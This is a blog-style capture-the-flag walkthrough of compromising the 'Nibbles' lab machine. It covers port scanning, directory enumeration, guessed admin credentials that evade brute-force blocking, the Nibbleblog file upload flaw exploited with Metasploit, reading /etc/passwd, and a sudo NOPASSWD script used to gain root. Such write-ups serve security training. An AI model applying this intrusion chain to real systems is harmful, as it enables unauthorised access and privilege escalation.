CTF Walkthrough: Nibbles

Drx
Drx
Jul 2, 2018 · 8 min read

Introduction

The following writeup shows the process I used to capture the user and root flags on Nibbles machine at @ 10.10.10.75.

This document contains my field notes I took when I was working through the box.

My way of thinking

The first step consists of the reconnaissance phase as ports scanning, banner grabbing, misconfigurations and so on. The second one to find the weakness, then, the attack itself, finally the privileges escalation called “post exploitation phase”.

Personal notice: The post exploitation was a quite complex, I will do my best to explain how I rooted the “Nibbles machine”.

Subscript: Something was hidden, and the goal was to find the GOHST!!! Let’s roll with our genius Homer Simpson ;)

Ports scanning

During this steep we are going to identify the target to see what we have behind the IP address.

BTW, the results are above:

sudo nmap 10.10.10.75

Starting Nmap 7.40 (https://nmap.org) at 2018–02–20 17:

Nmap scan report for 10.10.10.75 Host is up (0.023s latency).

Not shown: 998 closed ports Host is up (0.023s latency).

PORT STATE SERVICE

80/tcp open http

22/tcp open ssh

Uptime guess: 198.840 days (since Sat Aug 5 22:12:12 2017) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds

Explanations

The remote system is a Linux (we don’t know for the moment the distribution).

On the system we have a web server and a remote access.

With these elements in hands, we are going to check these two services. To do that, we opened our browser, and for the second one, opened a terminal with the basic credentials.

Step 1.1 The Web server:

The result of our browsing is a simple “hello word”!

Hello word page

Step 1.2 The remote access:

The result of the basic SSH connection in our terminal.

Identification

Let’s take look at the headers on the web server

curl -I 10.10.10.75

HTTP/1.1 200 OK

Server: Apache/2.4.18 (Ubuntu)

Content-Type: text/html; charset=UTF-8

The reflex is to look at the source code to find an interesting stuff. It could be nice ;)

The website source code

So, we have found a comment in the source code. Does it our ghost?

The next step, is to browse the IP address with the new repository (/nibbleblog/)

Nibbleblog access without to be log

Our distant system is a simple web server under Apache 2.4.18.

Enumeration

At this point of the challenge, we know more about the machine. So, we enumerated some directories of the website.

sudo python3 dirsearch.py -u http://10.10.10.75/nibbleblog -e -f -x 400,403,404 [sudo] password for root:

_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )

Extensions: -f | Threads: 10 | Wordlist size: 6038

Error Log: /home/user/Documents/pentesting/tools/web/dirsearch/logs/errors-18–02–21_00–45–19.log Target: http://10.10.10.75/nibbleblog

[00:45:19]:

[00:45:22] 301 — [Starting 00:45:22] 200 — [00:45:22] 200 — [00:45:22] 200 — [00:45:23] 301 — [00:45:23] 200 — [00:45:28] 301 — [00:45:31] 200 — [00:45:31] 200 — [00:45:31] 200 — [00:45:32] 301 — [00:45:32] 200 — [00:45:35] 301 — [00:45:35] 200 — [00:45:38] 301 -

321B — /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/ 48B — /nibbleblog/admin.php

2KB — /nibbleblog/admin/

2KB — /nibbleblog/admin/?/login

332B — /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/

2KB — /nibbleblog/admin/js/tinymce/

323B — /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/

48B — /nibbleblog/index.php

48B — /nibbleblog/index.php/login/ 78B — /nibbleblog/install.php

325B — /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/ 34KB — /nibbleblog/LICENSE.txt

323B — /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/ 5KB — /nibbleblog/README

322B — /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/

Directories enumeration

Further enumeration

The directory enumeration phase reveals some very interesting folders. Some of are the install from scratch (misconfigurations).

Bellow the directories found:

http://10.10.10.75/nibbleblog/admin.php

http://10.10.10.75/nibbleblog/admin/?/login

http://10.10.10.75/nibbleblog/admin/js/tinymce/

http://10.10.10.75/nibbleblog/content/

http://10.10.10.75/nibbleblog/index.php

http://10.10.10.75/nibbleblog/index.php/login

http://10.10.10.75/nibbleblog/install.php

http://10.10.10.75/nibbleblog/languages/

http://10.10.10.75/nibbleblog/plugins/

http://10.10.10.75/nibbleblog/README

http://10.10.10.75/nibbleblog/themes/

As you can see, the only one which is interesting for us, is the admin page.

http://10.10.10.75/nibbleblog/admin.php

Admin access point

With this element we can access as admin on the blog. Then, we’ll compromise the system by this attack vector.

Now that we have the admin interface, we are going to use the brute force technique to attempt to find the access.

After the process in action, we noted the system is configured with a protection (anti brute force with a black list process).

Error login Access

Well, we were blocked for around 5 minutes with the error page above.

So, the only solution in our situation were “ the guessing» (to avoid the detection). The username could be ‘admin, administrator’ and the password ‘nibbles, nibble’.

After these “guessing step”, we found the credential. These are:

  • Username: admin
  • Password: nibbles

By the way, we’re almost in!! so, what’s next?

The Weakness

Let’s talk about the access point we could exploited. Given that we were in, the next step was to browse under administrator access.

We explored the blog we founded by browsing it (each page) and with the help of the last step (directory enumeration). So, let’s go ;)

By using our enumeration, we browsed an interesting page wish show the plugins. (the other were not interesting for us because no upload function).

So, as we can see, you have one good stuff “My image/ Configure”. It does allow us to upload some picture in the blog. But, it’s a HUGE for us because we could send a backdoor to interact with the host system.

Plugins Access

In more details, we browsed the specific folder “My_image”.

Plugins repertory

The inside of the repertory

Then, we seen the details off pictures system. By digging more and more, the mechanism of upload, we remarked that if a picture was uploaded nothing weren’t be updated in the folder.

We have now our vulnerability: Nibbleblog File Upload. With some researches, this vulnerability refers to the CVE-2015–6967.

Exploitation

With all information we’ve got, we can make our intrusion on the remote system.

To do that, we launched a shell to use METASPLOIT. So, let’s start the game ;)

At first, update the framework. It’s required to have the new version.

So, the steps required were:

  • Searched the exploit :> nibbles
  • Configured the exploit
  • Configured the payload
  • Ran the exploit

Please find above the setup of our intrusion.

Configuration of nibbles exploit

That’s great, we are in! The last step is to get escalade privileges to catch the flags

The next screenshot shows that we are well in the server.

meterpreter > sysinfo

Computer : Nibbles

OS : Linux Nibbles 4.4.0–104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 Meterpreter : php/linux

meterpreter >

Privilege Escalation

Once in we had to find some flags. The first one was the user flag, and the second one, the root flag of the machine.

- The user flag was easy because we found the user directory and the text file were in it.

- The root flag (system admin), more complex! One indication was given ;)

When we got in, we were at the root of the website. So, the only solution for me was to find the user directory and to catch the flag.

So, in MSF, just use the Linux command for it.

In the description, some directories had been deleted for easier reading.

Always know where you are and where you want to go!!

meterpreter > ls

Listing: /var/www/html/nibbleblog/content/private/plugins/my_image ==================================================================

Mode Size Type Last modified Name

— — — — — — — — — — — — — — —

100777/rwxrwxrwx 14160 fil 2018–02–21 15:59:02 +0100 cowroot 100644/rw-r — r — 258 fil 2018–02–21 17:44:55 +0100 db.xml 100644/rw-r — r — 1292 fil 2018–02–21 16:39:25 +0100 image. 100644/rw-r — r — 1113 fil 2018–02–21 16:03:40 +0100 image.bin 100644/rw-r — r — 1113 fil 2018–02–21 16:18:23 +0100 image.jpeg

meterpreter > cd ..

meterpreter > cd home

meterpreter > cd home

meterpreter > ls

Listing: /home

==============

Mode Size Type Last modified Name

— — — — — — — — — — — — — — —

40755/rwxr-xr-x 4096 dir 2018–02–21 15:59:22 +0100 nibbler

meterpreter > cd nibbler

meterpreter > ls

Listing: /home/nibbler

Mode Size Type Last modified Name

— — — — — — — — — — — — — — —

100400/r — — — — 33 fil 2017–12–29 11:43:54 +0100 user.txt

meterpreter > cat user.txt

b02ff32bb332deba49eeaed21152c8d8

In order to catch the ultimate flag, we had to drop in shell mode to work more easily. So, I’ve tested the version of sudo and done some investigations.

The most important answer to root the server was:

User nibbler may run the following commands on Nibbles: (root)

NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

***Possible Sudo PWNAGE!

-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh

Let’s roll for root flag?

meterpreter > shell

Channel 1 created.

head -n 8 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

sudo -l

sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

***Possible Sudo PWNAGE!

-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh

chmod 777 /home/nibbler ./monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$

sudo -u root /home/nibbler/personal/stuff/monitor.sh

root@Nibbles:/#

pwd

/root

root@Nibbles:~# cat root.txt

cat root.txt b6d745c0dfb6457c55591efc898ef88c

Drx

Written by

Drx

Pentester |#WhiteHat | |#Pentester | #Pentesting |#Cybersecurity |#Linux | |#debian | |#kalilinux |#infosec | |#GNU | drx51@protonmail.com

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade